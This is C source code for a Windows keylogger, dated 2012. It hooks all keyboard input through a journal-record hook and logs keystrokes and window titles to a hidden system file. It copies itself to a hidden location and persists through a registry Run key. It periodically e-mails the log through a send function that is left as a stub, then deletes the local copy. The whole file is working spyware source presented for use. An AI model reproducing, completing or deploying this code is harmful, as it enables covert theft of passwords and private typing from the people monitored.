/** (c) 2012 Michał (Foxbond) Chraniuk */
#include <stdio.h>
#include <windows.h>
#include <wininet.h>
BOOL logging=FALSE;
HANDLE fCap=0;//the cap file
DWORD dwCap=0;//thread ID
HANDLE hCap=0;
HHOOK lHook=0;//the log hook
HWND prevF=0;//our last focus
HMODULE hMod=0;
LRESULT __stdcall klProc(int c,WPARAM w,LPARAM l)//the journal log process
{
if(c<0)
{
return CallNextHookEx(lHook,c,w,l);
}
if(c==HC_ACTION)//there is a message sent to a window
{
EVENTMSG *eptr=(EVENTMSG *)l;
if(eptr->message==WM_KEYDOWN)
{
DWORD dc,db;
char myBuff[256];
int virtue,ns;
virtue=LOBYTE(eptr->paramL);
ns=HIBYTE(eptr->paramL);
ns<<=16;
HWND hf=GetActiveWindow();//did focus change?
if(prevF!=hf)
{
char st[256];
int nco;
nco=GetWindowText(hf,st,256);//get the windows text
if(nco>0)
{
char myBuff[512];
wsprintf(myBuff,"\r\n%s\r\n",st);
WriteFile(fCap,myBuff,lstrlen(myBuff),&db,0);
}
prevF=hf;//last focus = prev focus
}
dc=GetKeyNameText(ns,myBuff,256);//gets the string representing keys name
if(dc)
{
if(virtue==VK_SPACE)
{
myBuff[0]=' ';
myBuff[1]='\0';
dc=1;
}
if(dc==1)
{
BYTE kb[256];
WORD myword;
int numwords;
GetKeyboardState(kb);
numwords=ToAscii(virtue,ns,kb,&myword,0);//translate virtual key codez
if(numwords>0)//if one or two chars were copied to buffer
{
WriteFile(fCap,&myword,numwords,&db,0);
}
}
else
{
WriteFile(fCap,"[",1,&db,0);
WriteFile(fCap,myBuff,dc,&db,0);
WriteFile(fCap,"]",1,&db,0);
if(virtue==VK_RETURN)
{
WriteFile(fCap,"\r\n",2,&db,0);
}
}
}
}
}
return CallNextHookEx(lHook,c,w,l);
}
DWORD __stdcall klThread(LPVOID lpv)
{
//handle caps lock
MSG mymsg;
BYTE dimkeys[256];
int i;
for(i=0;i<256;++i)
{
dimkeys[i]=0;
}
prevF=0;
fCap=CreateFile((char *)lpv,GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,0);
if(fCap==INVALID_HANDLE_VALUE)
{
EXIT_FAILURE;
}
SetFilePointer(fCap,0,0,FILE_END);
lHook=SetWindowsHookEx(WH_JOURNALRECORD,klProc,hMod,0);//global hook;record and watch input events
if(lHook==0)
{
CloseHandle(fCap);
fCap=0;
return EXIT_FAILURE;
}
logging=TRUE;
while(logging)
{
while(PeekMessage(&mymsg,0,0,0,PM_NOREMOVE))//dont remove after processing
{
GetMessage(&mymsg,0,0,0);//get message from calling threads queue of msgs
if(mymsg.message==WM_CANCELJOURNAL)//user cancels app journaling
{
SetKeyboardState(dimkeys);//copy 256 byte array
lHook=SetWindowsHookEx(WH_JOURNALRECORD,klProc,hMod,0);
if(lHook==0)
{
CloseHandle(fCap);
fCap=0;
return EXIT_FAILURE;
}
}
else
{
DispatchMessage(&mymsg);
}
}
Sleep(1);
}
UnhookWindowsHookEx(lHook);
CloseHandle(fCap);
fCap=0;
hCap=0;
return EXIT_SUCCESS;
}
int klLog(const char *file)
{
//start the logging
if(logging==TRUE)
{
return EXIT_FAILURE;
}
hCap=CreateThread(0,0,klThread,(LPVOID)file,0,&dwCap);
if(hCap==0)
{
return EXIT_FAILURE;
}
if(WaitForSingleObject(hCap,5000)==WAIT_OBJECT_0)
{
return EXIT_FAILURE;
}
SetThreadPriority(hCap,THREAD_PRIORITY_LOWEST);
return EXIT_SUCCESS;
}
bool klStop()
{
//stop the logging
if(logging==FALSE)
{
return false;
}
logging=FALSE;
if(WaitForSingleObject(hCap,5000)!=WAIT_OBJECT_0)
{
return false;
}
return true;
}
bool klFetch(const char *server,const char *to,const char *toname,const char *from,const char *subject,const char *body,const char *attachment)
{
//send the e-mail, should be self explanatory
return true;
}
int __stdcall WinMain(HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nFunsterStil)
{
if(__argc!=12)
{
return EXIT_FAILURE;
}
char filename[MAX_PATH];
GetModuleFileName(0,filename,MAX_PATH);//get name of the running app
SetFileAttributes(__argv[1],FILE_ATTRIBUTE_NORMAL);
CopyFile(filename,__argv[1],false);
if(SetFileAttributes(__argv[1],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM)==ERROR_SUCCESS)
{
return EXIT_FAILURE;
}
HKEY hklm;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&hklm)!=ERROR_SUCCESS)
{
return EXIT_FAILURE;
}
if(RegSetValueEx(hklm,__argv[2],0,REG_SZ,(LPBYTE)__argv[3],strlen(__argv[3]))!=ERROR_SUCCESS)
{
return EXIT_FAILURE;
}
RegCloseKey(hklm);
hMod=GetModuleHandle(0);//imperative,without this keylogging wolnt work.
while(true)
{
klLog(__argv[4]);
Sleep(atoi(__argv[5]));
klStop();
DWORD ThreadID;
if(InternetGetConnectedState(&ThreadID,0)==true)//are we connected to internet?
{
klFetch(__argv[6],__argv[7],__argv[8],__argv[9],__argv[10],__argv[11],__argv[4]);//e-mail the file
DeleteFile(__argv[4]);
}
}
return EXIT_SUCCESS;
}
> Back